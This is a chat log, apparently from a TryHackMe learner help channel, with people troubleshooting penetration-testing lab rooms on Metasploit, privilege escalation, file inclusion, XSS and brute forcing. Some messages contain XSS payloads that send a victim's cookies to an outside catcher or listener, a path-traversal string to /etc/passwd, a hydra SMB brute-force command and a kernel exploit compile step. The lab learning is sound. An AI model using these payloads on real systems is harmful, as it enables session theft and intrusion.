Yep I saw you message the same thing in another channel. Don't think you're supposed to be doing that.
Hi all, still running into issues with Metasploit: Exploitation initializing a reverse proxy, I launched the .elf downloaded it to the box, chmod to run the rev_shell.elf, started msfconsole, use exploit/multi/handler, set payload php/reverse_php, set attacking system IP and port from rev_shell, msfconsole output "Started reverse TCP handler on 10.10.32.231:9000", box output "Segmentation fault (core dumped)" where do I run the hashdump module? where is the shell?
did you set local host and port?
on the exploit? yes for sure
did you set your attack machine running the handler to listen before executing the rev_shell on the target?
is this the eternal blue payload?
I never tried running the handler first... I'll go through the steps again, the attackbox was disconnected
no this isn't eternal
Make sure you are using the same payload for your handler as you used to generate the .elf file in msfvenom
so if it generates a tcp rev shell then I need a tcp payload?
that article may help as well, looks like a similar issue
Not only does it have to match the tcp part, it has to match exactly the payload you used in msfvenom
make sure the slashes and underscores match up exactly
that was it! I changed my payload to linux/x86/meterpreter/reverse_tcp, and started the shell after I ran the exploit
now I have a running shell! thank you @worldly orchid and @shadow echo
Gave +1 Rep to @worldly orchid
You are welcome, not a big deal because of the rep 🙂
Gave +1 Rep to @shadow echo
glad you got it figured out!
Hello guys, I'm doing the Metasploit module, but I'm facing difficulty using the search command because it usually returns too many modules. Is that a way that it would return only modules that match all the terms that I want? For example, I would like to search for a module that contains the terms 'smtp' AND 'relay'
Just write the keywords? So search smtp relay
Ok, but this way it acts like "search smtp OR relay", which ends up giving more results than only searching for 'smtp'. Maybe it doesn't have another way, but I only want to be sure
What's the version of metasploit you are using? As that's the result I get with that search:
I'm on authentication bypass task 3 and not sure what I'm doing wrong here. I outputted the users from task 2 into a text file and cleaned it up, but still nothing.
Oh. Hmm. catting the file outputs nothing, but if I nano into it I can see them.
Aha, had to tell nano to save the file as DOS format instead of Mac format
@ruby smelt aha!
hi guys i just passed my eJPT exam today... thank you for all the support ❤️
well done, congratulations 🎊
Congratulations! Are you going to try for another certification or are you staying with this one?
Hello, kinda new here. I have A+ and Sec+, attempted Net+ and will again. Striving for a career in Pentesting. I assume this is a good place to come for career path advice?
k
Please don't ask the same question over several channels
I got a question on a cross site scripting question in jr pentesting I've been stuck on
can anyone help me with rlwrap
In -fs switch what size should i use in subdomain enumeration
Hello... I am new here...
I need a guide to go further in cybersecurity...
for now I'll stick with this one. After I graduate I'll grab another certificate
I'm going through Windows Privesc room and the target machine I'm supposed to use for Task 6 does not have internet access. I don't understand how I'm going to reverse shell a machine with no internet access. Is there an issue or am I missing something?
yes
yes that's cool, I can wait
ah, thanks for trying
I have tried it a few times
I also watched a tutorial on youtube and in the video the guy's target machine has internet access
yes
I don't think it's intended because the directions say you can connect to the target system:
You're supposed to generate a msfvenom payload and move it to the target machine
none of this can be done if the target has no internet
I also can't ping the target from the attackbox
Windows machines don't respond to pings
All Victim machines do not have internet access for obvious reasons.
"Victim machine" sounds so terrible, we are not looking for victims 😄
Sounds better, ye 😄
THM Reddit mod's words, not mine 😂
I see, so it should still work
Target machines are connected to thm network that you can access using either the attack box in browser or OpenVPN on your own machine or VM. They don't need to have access to the internet.
I recommend going through some basic networking concepts to understand how networks and VPN work
You're in a LAN with the target. You use your tun0 ip, that's your VPN IP that's on a lan with the target.
OH, that makes total sense. I can understand why the targets are configured that way. Thanks for the clarification!
Gave +1 Rep to @idle bison
Hey guys, just working on Linux PrivEsc: Privilege Escalation: PATH and I'm a bit stuck on something. When I run the path app, it doesn't launch a bash session as root. I noticed the first few steps in the screenshots we performed as root on the target machine. Could that be the reason?
karen@ip-10-10-133-158:/tmp$ ls -l path
-rwsr-xr-x 1 karen karen 8392 Feb 14 20:00 path
karen@ip-10-10-133-158:/tmp$ ls -l thm
-rwxrwxrwx 1 karen karen 10 Feb 14 20:10 thm
permissions look correct
or the SUID bit is set
Not to me, it's not root owned
ah yeah, of course
ermm so I need to compile it as root then on the box, but in the guide I don't see where I gain root on that box
oooh so it needs to be an existing file owned by root but that karen has write permissions to?
no
When you write it, it'd kill the suid permissions
I'd recommend pausing that linux privesc room and doing Deja Vu if you want what is, in my opinion, a very thorough explanation of the PATH exploit.
Full disclosure, I did create it but I've had a lot of positive feedback over that explanation
hahah OK mate, I will do that. Thanks for the suggestion
Yup yup, already on it. Thanks again @idle bison
Gave +1 Rep to @idle bison
Sorry @idle bison but I must still be missing something. In your room, the ServerManager app is already owned by root with the SUID bit set
My issue was that in the screenshot, the path app is compiled by root but I don't see where you gain root in that room
gcc doesn't exist on the box and can't be installed by karen
so I compiled it on my own box and transferred it over but then it only has Karen's permissions
am I supposed to follow the guide precisely or should I be trying to get root some other way to compile the app on the target box?
or should I drop back down to a standard user as in the screenshots. if the latter is the case, it doesn't make sense to drop back down to a standard user to complete the task so I think I must be missing something important
Gave -1 Rep to @idle bison | James
Kidding...
So you can't get root from it, it seems
This was a little confusing for me as well before I read the hint in that task. There is already a compiled executable that will run the 'thm' you created and set the suid bit in the process
Hint ||You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file.||
hi
I'm doing burp intruder
out of scope requests are caught by the proxy
I don't understand why
I've set it in the target tab, and I disabled logging of out of scope proxy traffic
does anyone have a clue
and yes I've checked "in target scope" in the proxy options
sorry I meant they're intercepted
in my "include in scope", there's the target IP (the Bastion Hosting website)
and in my "exclude from scope" there's nothing
when I turn intercept on, everything is intercepted, out of scope requests too
they're not suspended because the pages load on my browser
but they show up in the proxy
yes
this is checked
they show up in the proxy, in the intercept tab, like they were intercepted, but the pages load
for example as soon as I turn my intercept on it intercepts my twitch requests even tho it's out of scope, but without stopping the twitch requests
I still have the forward and drop buttons clickable
you want the whole thing?
what is that
everything works fine now 
thank you
Hey guys, I'm actually doing the Windows Privesc room and I don't know why but it seems that the command "sc" in Powershell is not working
when I'm running for example:
sc qc "FoxitReader"
I do not have any result
do you know why ?
thx for the help🙂
sc is an alias for set-content in powershell. So either run that command in CMD or use sc.exe
@shadow echo thank you, I've just realized what I was doing wrong, I was running it in Powershell...
Gave +1 Rep to @shadow echo
Hey doods, I'm at the last point question in the File Inclusion
Can I host a file to make the website fetch?
You can, yes
cheers, looking into it 
Thanks for the tip, saved my sleep tonight 😄
Gave +1 Rep to @shadow echo
Hello. I'm having an issue with the Linux PrivEsc room, Task #2. I've seen others with the same issue but no solutions. The issue is in creating the UDF I get a file too short error. See below:
mysql> create function do_system returns integer soname 'raptor_udf2.so'; ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 22 /usr/lib/mysql/plugin/raptor_udf2.so: file too short)
Hi. I'm trying to do an attack using Burp Intruder. In the Burp Suite Intruder room it gives us username and password credentials, but when I try to do the attack there is no 200 response for the credentials. Can anyone help me?
room link: https://tryhackme.com/room/burpsuiteintruder
Task:10
Hello everyone, I need help in the last task in the XSS room
After decrypting the hash I can't complete the task
Did you open the ticket with the payload that you created on your own ?
yes
Then that's the reason, you only received your own session cookie, instead of the session cookie of a staff member
You have to wait until the automation that's behind is getting triggered to open your ticket as a staff member
Maybe you have to restart the target machine and create a new ticket and/or use the request catcher, this machine's task is a bit finicky
Thanks
-unmute @sand wigeon Please don't try to ping everyone. There's 120 thousand people in this discord, it'd be very rude to ping them all at once.
🔊 Unmuted kalyugera#4869
Sorry 🙇🏻♂️
I'm only 20% done but maybe i can help?
Still need help?
No I solved that. thanks
Gave +1 Rep to @gusty fulcrum
I really hope that is not enabled in the server for anyone.
Nmap Advanced Port Scans - Task 2
Neither of these options return any open|filtered ports -sF, -sN, -sX
Could you send a screenshot of your results ?
with -v or -vv?
Doesn't matter, just the final result nmap gives you after doing the FIN scan
shit
forget it
I found the error myself
jeez, one should connect via VPN first.... -.- Sorry
forgot that I rebooted the VM after an update
Hello 😀 I am on Linux PrivEsc Task 5. Kernel Exploits. I have transferred this exploit CVE-2015-1328 to the target machine by python webserver. But I am having problems executing the 37292.c file. I tried changing permissions also, in the screenshot. Does anyone have a helpful clue to help me complete this task? Thank you.
It's a C file. C is a compiled programming language - before it can be executed, it must be compiled to a binary (executable, like exe) file
Got it! Thanks so much 👍😀 @idle bison
Gave +1 Rep to @idle bison
somehow gcc is easy to use with standard settings
OK @sage current thanks I will try gcc 👍 great support 😃
oh huh thought you already figured out how to compile the code
No not yet.
gcc is just one option but it is also a very good one to choose
gcc is not quite but almost universal across the entire linux space
Yep it worked with this gcc command: gcc 37292.c -o outp Thanks again for the help 😃
Hello😀 , I am working on the file inclusion room and I've been trying to find the third flag for a while now. I changed the get request to a post request since the get request does not accept special characters but even at that, when I include /etc/flag3%00 I still can not get the flag. I also tried path traversing but that still did not work. I need some help
Would be best if you verify in order to be able to send screenshots and then show a screen of your request
!docs verify
why this return true? table name is 'users'
Maybe there is more than 1 table
thanks
No I meant a screenshot of the request you are making, not the error/warning you get as reply.
Okay, well that's most likely not going to work that way, as your %00 will get URL encoded if you send the request like that by using that file inclusion box. So try to use the network tab of the developer tools, or use Burp or curl
You need to do it in burp
Okay, let me try that. Thanks
Capture it in the proxy > send to repeater > at the bottom you need to include it by typing file={path to flag}
With the nullbyte at the end of the file request
Like fontaene said
I found the flag😃
Thank you for the help @shadow echo and @final perch
Gave +1 Rep to @shadow echo
+rep @final perch
Gave +1 Rep to @final perch
try gobuster dir -u ...
Why is there a need for dir?
Can you please explain to me?
helps you find anything that you can take a look at that may not have been visible to you previously basically
Yes you are right
But I saw a walkthrough video of John Hammond and he was just using gobuster -u.
Personal preference I think, I’m not that experienced lol
So I just want to know why gobuster dir -u will be used.
I am new to this, that's why I want to know.
I think in the previous versions of gobuster you didn't have to specify the mode, now you can do dns or vhost enum plus the dir
And also here need to replace $IP with actual IP address
2.0.1 doesn't need dir to be specified
seems it defaults to dir mode
this on ubuntu with the latest version of gobuster in the ubuntu repos
Thanks a lot
apparently the ubuntu repo version is quite old according to the kali repo version
or well it is one major version behind only
Hi! I'm working in the room "Authentication Bypass". Having a problem with FUZZ. With all ffuf commands I get this error: Encountered error(s): 1 errors accured. * stat names.txt : no such file or directory. Has anyone else had this problem? How can I fix it?
If it's an exported variable then...
Nobody care to help me?
Don't know your command, but that error is suggesting that it can't find the names.txt so try to provide the full path to the file
screenshot of the command and also a screenshot of catting said names.txt file
please and thank you
@steel nexus ⬆️
Yes. The problem was that the full path was not provided in the code. It is solved now.
Hi! I just don't get this "File Inclusion". I understand the technique, but the logic is either very difficult or explained poorly.
Which part
Need to specify a bit
hi
In walking an application, I found a flag
but it wasn't used anywhere in the room
||THM{CHANGE_DEFAULT_CREDENTIALS}|| this was the flag
that rooms target machine is used for multiple rooms and things so of course it has some flags that feel unused but are used elsewhere
lmao, I stayed for like 40 minutes trying to figure out what spelling mistake was there
i.e used in other rooms
What are the advantages/drawbacks of gobuster vs duff vs dirb?
well duff is for sure the best drink out of the 3
but on a more serious note it has to do with availability and standard used list and how it formats outputs
Ooops I meant ffuf. So they are basically equivalent?
nah they also have some special options that can be used that the others sometimes lack
when it comes to ffuf that is
You mean ffuf lacks some options or the opposite
the opposite
ffuf has some options that are not included in gobuster
and gobuster does not run recursively on directories while dirb can and does by default @cinder forge
So ffuf>dirb>gobuster in terms of options?
well nah sometimes one is better than the other but it is specific to just those specific use cases
OK thank you!
hi...
hello guys
I am working on the Attacktive Directory room (windows active directory)
I keep getting this error "import error: no module named pyasn1.codec.der" whenever I use the GetNPUsers.py tool in impacket to query AS-REP roastable accounts
please anyone with any suggestion
on how to tackle the issue
yo
yeah i know
Has anyone completed the room "Ice"? I'm having a problem with one of the questions.
while using the exploit, it is required to set the session right. When I set session 1 and run the exploit it doesn't work.
here is the exploit/windows/local/bypassuac_eventvwr
```
Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     1.1.1.1          yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   0   Windows x86
```
for the lhost I'm using my ip. so the problem is not there
how do I set it? I set it to 1, but it is not working.
how do I set a session? when I list sessions it says I have no active sessions.
maybe. let me try again.
Ooo I forgot to get back to you, it worked, I used ctrl c instead of ctrl z. thanks buddy for the help
thanks buddy.
Is the path free
!docs freepath
Don’t think this one specifically is at certain point
But 10 it’s worth a trial if you got value from other free modules
uuum can shadow get some help with the Metasploit: Meterpreter room on task 5 question 2: shadow get this result when running the post exploit for that question:
it seems to kill the meterpreter session each time
how can shadow get around that???
Have you tried to restart the target machine already and give it a good 5 mins to make sure it's fully booted?
nope not tried that
but everything seemed to work... including getting a meterpreter shell back
just it seems to kill itself when shadow runs the post
anyways going to reboot the target and try again
Ye, maybe it's not solving the issue, who knows, but I guess that's the easiest thing to start trying with when it comes to weird behaviour
will keep you updated if it works better this time
Well yea I know the basics of other stuff but I wanted to learn more about pentesting and I found this path so I was wondering if I have to get VIP to learn this path
well turns out shadow could get the info from the sysinfo command in the meterpreter shell... the module did still not work but whatever when all the other stuff worked nicely
I'm in the LFI room. I managed to get to the passwd file in the lab n2 ||by requesting .. /.. /.. /.. /etc/passwd|| However, in order to determine the number of dot dot slashes, I had to manually increment it until getting the desired output. Could I have guessed the number of dot dot slash otherwise?
No, you just have to try until you get it as you don't necessarily know which directory you might be in
Although you could set up a script that would add "../" every time until the website gives you a different response
or you could just go with 20 ../ because if you try and access a dir over the root dir that way nothing happens and you just get the result you want
Were you able to see warnings/errors on the page when using the wrong amount of directory traversals? If yes, then you could have determined the amount.
Never knew this, will remember, thanks Shadow
shadow tends to do it by trial and error still, but if shadow has a short amount of time they will just copy a super long string of ../ to do it that way
when I try to move seclists from desktop to user/share/wordlists it gave me that error, what can I do about it
I'm doing Burp Suite hashing and at the end we have to find which key has the right hashsum of 3166226048d6ad776370dc105d40d9f8, I've tried hashing the keys with the last newline and without it but I never get the expected hashsum
I know it's ||key3|| I've looked it up but I can't figure out why I don't get the right hashsum
in Burp I hash it in MD5 then encode it in ASCII Hex
I'm copying the key from the first character to the last, with and without the last newline
I'm looking to see if I can get it to match as well and if I recall I never did get Burp Suite to show it correctly, I just did the md5sum command in cli
When I do it in Burp Suite i get one that starts with d2fe
Oh that's neat
Yes, but there are several paths in the error message and I don't understand which one to use
You got a screenshot ?
So it's saying /var/www/html/lab2.php which is the page you requested in your url. Therefore you would need 4x ../ to get all the way back to the root directory.
So 1 time to get out of the lab2.php file itself, and 3 times to get back to the root directory.
But isn't the directory name "includes"?
Ah ye, you're right, there is an includes directory in the function.
Then it can't be /var/www/html/lab2.php right?
Sure, that's still the directory you are in. But it would be /var/www/html/includes then
which still makes 4 jumps... TY!
Scratch that last explanation about getting out of the lab2.php itself, I think I was wrong with that. So in case there would have been no includes directory in the function itself, it would have been just 3x the traversal to get back to the root directory. 🙂
even outside of Burp I can't get the right sum
Could you show a screenshot of the key in burp where the start and the end of the key can be seen ?
It seems you are missing parts of your key. The BEGIN OPENSSH and END OPENSSH parts belong to the key, so you can not remove them, otherwise your md5 is not right anymore
thank you
Gave +1 Rep to @shadow echo
In the Blind XSS I can't seem to get netcat to work to catch the cookie, and the THM Request Catcher doesn't seem to be working either... I feel like I'm doing this right but I've been waiting quite some time to get the request back... what should I do at this point?
I understand how it works, I just can't get it TO work lol
Are you using your own machine or the attackbox ?
The AttackBox
Could you show me your payload ?
</textarea><script>fetch('http://83765a8b378a4b5cfbf9924178f3134b.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>
oh dunno why that showed up as a link but yea
Oh, I should have said, the payload for nc
oh lets see
</textarea><script>fetch('http://0.0.0.0:9001?cookie=' + btoa(document.cookie) );</script>
That's not your attackbox IP. 0.0.0.0 only means nc is listening on all of your interfaces
Not longer than 2 - 3 mins. But maybe you messed up the machine with the bad payloads you created previously
So restart the target machine
I'll wait a bit longer and I can try to reset the machine and try again after that
Anyone else have issues with the favicon md5 hash?
search says yes...nvm...will try what someone put in for a fix
nah right web address
I didn't. You still having issues?
I just searched the answer. I had all the correct information but still was getting the incorrect hash value
What's the full command you used
What are you using to export OpenVas report to Excel?
With OpenVAS you get a PDF or XML file, but I heard there are some tools that can convert that info easily to Excel.
foo, my XSS practical does not seem to be working or capturing the cookie 😦 I've tried it in both netcat and the THM listener a few different times with the correct IP and correct listener link
</textarea><script>fetch('http://10.10.102.62?cookie=' + btoa(document.cookie) );</script>
And then for the other one it was </textarea><script>fetch('http:baa4f283199cac95a6a5c6a7013f1ead.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>
For the netcat one I did nc -nlvp 9001 (oh and I forgot to add, I added :9001 to the end of the IP in the script)
hmmm let me look around a bit
So is the IP address the one listed under "Active Machine Information" or the one listed in the terminal?
ok, tried that one too
Did you ever find out about this? I'm having the exact same problem, and rebooting the box didn't help. I can see the sitemap.xml under network but can't access it, was I missing something obvious?
I lost my free attack box session so I need to subscribe, if I remember correctly it was 10.10.35.(maybe 137)
oh so I was using the wrong machine? Lmao! wow okay lol thanks for clearing that up!
I am in Linux PrivEsc, kernel exploit
I am trying to move my exploit to the target machine and it says it does not have permission to write files
I am using wget method from httpserver (as it says in the task to do)
Then you have to look for a directory on the target machine where you have write permission in
Got the solution, it's tmp actually, I had missed it
@shadow echo bro can I learn and join ethical hacking and cyber security even though I am in commerce stream?
I wouldn't see a reason why not, as you are on tryhackme that means you are already doing it. If you refer to a career, you might want to ask in #cyber-and-careers . There are probably people with more knowledge about it, but I wouldn't see a reason why not there either. Read about the success stories here: https://tryhackme.com/resources/blog
Am I adding the .txt file incorrectly here? under metasploit room
Not sure what I've done wrong if anyone knows
thank you I had the path wrong lol
Gave +1 Rep to @steel nymph
long day
I can't manage to make the THM request catcher to work... sending screenshots
gimme a sec
I am coming to the same conclusion...
For the XSS room
I used NetCat, but since the room mentioned the THM catcher, I figured out I would try it
adding it into /etc/hosts kinda works,
like so
But does the "victim" have the /etc/hosts correctly set?
yeh, that's the thing, It might not work correctly
better to use beeceptor, ig or a python3 webserver
Yep. So it is not a "me" problem then...
no, it's definitely broken
I know these tools, just wanted to try new stuff
welcome to today's "try a bunch of answers until one is marked as correct" in the room Linux PrivEsc ( https://tryhackme.com/room/linprivesc ) on task 3, last question
the benefits of having exploit databases like exploit-db
giving you a bunch of results that are all probably useable
it's a 2015 CVE if you're still looking
nah figured it out after 3 tries
Server/victim won't be able to resolve it though
Yeh, I figured that after trying it
** more or less usable
yeah
Glad I'm not the only person having a hard time with that XSS room!
Hello again, I am on Network Security - Protocols and Servers Task 3 Hypertext Transfer Protocol (HTTP). I connected with Telnet but I'm not sure how to retrieve the flag. Can someone give me a hint please of what to do next? Thanks very much.😃
What did you request?
You need to do 3 steps
- Establish a telnet connection
- Request the flag
- Define a host value
From what I see in your screenshot, you requested the wrong page... Looks like /
@runic lily thanks alot I figured it out😀
Gave +1 Rep to @runic lily
Yes I was requesting the wrong page
Hey do you guys have any learning path for pentest beginners? I have some experience with web programming but nothing related to hacking.
In https://tryhackme.com/room/burpsuiteom Task 8 requires you to capture a request from the admin/login endpoint of the target and send this to sequencer. It then tells you to change the Token Location Within Response to "Form field". However, the request captured from the login form is a POST method and so that "Form field" is not possible. Only by changing the request method (to GET) and then sending it to sequencer is it now possible.
I'm not sure if this was intentionally left out of the task description to make someone work it out themselves but if not, it may trip up a lot of people trying to complete this task.
Did you capture the request to the login page or the request while trying to login ?
While trying to login
Okay, then that's not what the task wanted you to do, as far as I saw that task
When I changed it to GET method the request was exactly the same though? Hmm, so it wanted me to capture the request while loading the page itself? Not the request of trying to login? Guess I misunderstood then
Yes, to the page itself
Hey guys! I got stuck on Jr. pentest intro to webhacking Content Discovery - Favicon
I cant seem to find the answer for the question about the favicon framework in the OWASP database
I've found the md5 hash and checked the OWASP database but I don't know what do to after that, is there anyone that can help me?
Have you found the service associated to that hash?
Thank you for helping me, I’ve talked to some guys on vc and they’ve helped me! Thank you guys again ❤️
Gave +1 Rep to @cinder forge
Hi there, what was the solution for this?
Edit:|| figured it out myself, so just I sign out so the service stopped, then run "sc start dllsvc", it will then execute the command that you have added to the dll file. 🙂||
I am doing Burp Intruder Task 11, I am wondering if I have this set up correctly
think step should be 1 but not 100% sure on that
other then that it looks correct
Is there an easier way to search for this flag lol that's a lot of results
in the list it shows the results you can sort it by response by clicking that thingy in the top bar
which will list the 200 ok responses at the top
which are the ones you are looking for
all of them are 200
ooh then something is obviously wrong
maybe check on content length then
if all the content lengths are the same too there is something else wrong
idang
would assume you are injecting the numbers in the wrong place for intruder if you still have problems
Show a screenshot of your request in the positions tab of intruder pls
One sec
yeah I think I'm doing something wrong, now I am getting one 200 status code, all others are 302
That request is not right, it has to be /support/ticket/NUMBER but your request is just to /support
hydra -l USERNAME -P WORDLIST smb://IP:PORT won't find a valid password - metasploit scanner/smb/smb_login finds a valid password (same wordlist and username) 🤨
SOLUTION:
hydra -l USERNAME -P WORDLIST smb://IP:PORT -m "LMV2"
For those who want to dig a bit deeper, there might be a possibility to determine the used authentication protocol with wireshark, but I wasn't able to do so atm (https://richardkok.wordpress.com/2011/02/03/wireshark-determining-a-smb-and-ntlm-version-in-a-windows-environment/)
I figured out what I was doing wrong with the XSS room, I was typing in the IP address with dashes instead of dots... derp
br0thers! all the best to you all on this path
Thx, but the problem was that hydra uses NTLM as the default dialect, but I needed to switch to LMV2. Currently I'm trying to figure out, if there's a possibility to check which dialect is currently in use
hi
Gave +1 Rep to @runic lily
Hello, just want to ask if you guys have the commands for the junior pentester path? I'm just starting the course and hoping you can share the commands via notepad. Seems I can't copy and paste the command from the guide to the linux terminal, dunno why.
I'm currently stuck on the final question of Task 2 of the metasploitexploitation room. I've run the smb_login module. I've set my rhosts and my pass_file but when I run, I get the following error:
[*] 10.10.5.162:445 - Error: 10.10.5.162: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB)
[*] 10.10.5.162:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Show a screenshot of your options pls
I restarted the attackbox and it worked after that 🤷♂️ . Didn't do anything differently
Hi, can you please tell me in what order and what paths should I be doing on TryHackMe? I am a beginner and would like to start from scratch to an advanced level of penetration testing.
It's worth paying for places like THM, so buying a subscription is not a problem 🙂 I already did the tracks a long time ago, so I have level 8 on THM, but I haven't done anything for a long time and now I would like to make a sensible learning plan. I have been working as a programmer for 8 years, and I have Linux SysOps certificates, so it might help me a bit.
Next after Junior is Offensive Security?
Ok, thanks for the help 🙂 I did the Offensive Security path first, a few months ago, but I completely didn't understand what was going on 😄
